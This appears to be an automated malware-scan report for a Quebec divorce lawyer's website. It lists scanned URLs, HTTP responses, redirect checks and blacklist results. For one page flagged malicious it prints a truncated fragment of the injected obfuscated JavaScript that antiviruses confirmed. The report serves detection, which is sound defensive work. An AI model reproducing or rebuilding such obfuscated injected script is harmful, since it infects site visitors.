Scanned pages/files
Request | Server response | Status |
http://www.quebecdivorcelawyer.com/ | HTTP/1.1 200 OK Connection: close Date: Sun, 22 Jun 2014 04:49:06 GMT Accept-Ranges: bytes ETag: "88a11f-1279-4fa5d840a1b40" Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 4729 Content-Type: text/html Last-Modified: Tue, 27 May 2014 08:31:01 GMT | clean |
http://www.quebecdivorcelawyer.com/english/index.php | 200 OK Content-Length: 29777 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(kMG){var cZd=function(Tl){return Tl["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},psh=function(rl){return rl[cZd(918239)]("") },zA=""+psh(["\xd3\\\x14\xaf\xf2","\xa5\xd8\xc9|\xdd","\x08\x9a\x90\xce\x05","_\xf8\xfe3\xd8\xb4","\x13\xf9,;4\x0c=\x18",")5\x1b(\x1d\x18,\x1a","\x18=1\x1c4\x09),=+","\x11;+|XM#F\x0b?>","\x0fh\x20]dHwu\x17l@","o`vfy;\x0b\x1c\x1c","\x01\x1a1(\x1a\x1c9","\x181\x1e$)(:(;4\x0c","9\x18-\x189Ge\x7fFd|","[\x7f9r7\x09Z^QA)1L!","\x11?9\x11h&\x11N%L&","p=+\x12\x1 Antivirus reports:
| ||
http://code.jquery.com/jquery-1.7.min.js | 200 OK Content-Length: 94020 Content-Type: application/x-javascript | clean |
http://www.quebecdivorcelawyer.com/../english/js/youmax.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.quebecdivorcelawyer.com/test404page.js | 404 Not Found Content-Length: 198 Content-Type: text/html | clean |
https://d36hc0p18k1aoc.cloudfront.net/public/js/modules/tintembed.js | 200 OK Content-Length: 237883 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: quebecdivorcelawyer.com
Result:
GET / HTTP/1.1
Host: quebecdivorcelawyer.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: quebecdivorcelawyer.com
Referer: http://www.google.com/search?q=quebecdivorcelawyer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: quebecdivorcelawyer.com
Referer: http://www.google.com/search?q=quebecdivorcelawyer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=quebecdivorcelawyer.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://quebecdivorcelawyer.com/
Result: quebecdivorcelawyer.com is not infected or malware details are not published yet.
Result: quebecdivorcelawyer.com is not infected or malware details are not published yet.